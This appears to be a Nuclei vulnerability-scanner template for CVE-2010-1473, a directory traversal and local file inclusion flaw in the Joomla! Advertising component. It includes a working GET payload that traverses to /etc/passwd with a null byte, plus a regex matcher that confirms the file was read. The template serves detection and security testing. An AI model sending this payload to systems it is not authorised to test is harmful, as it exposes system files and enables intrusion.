id: CVE-2010-1473 info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 - https://www.cvedetails.com/cve/CVE-2010-1473 - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - http://web.archive.org/web/20140723213338/http://secunia.com/advisories/39410/ remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1473 tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/14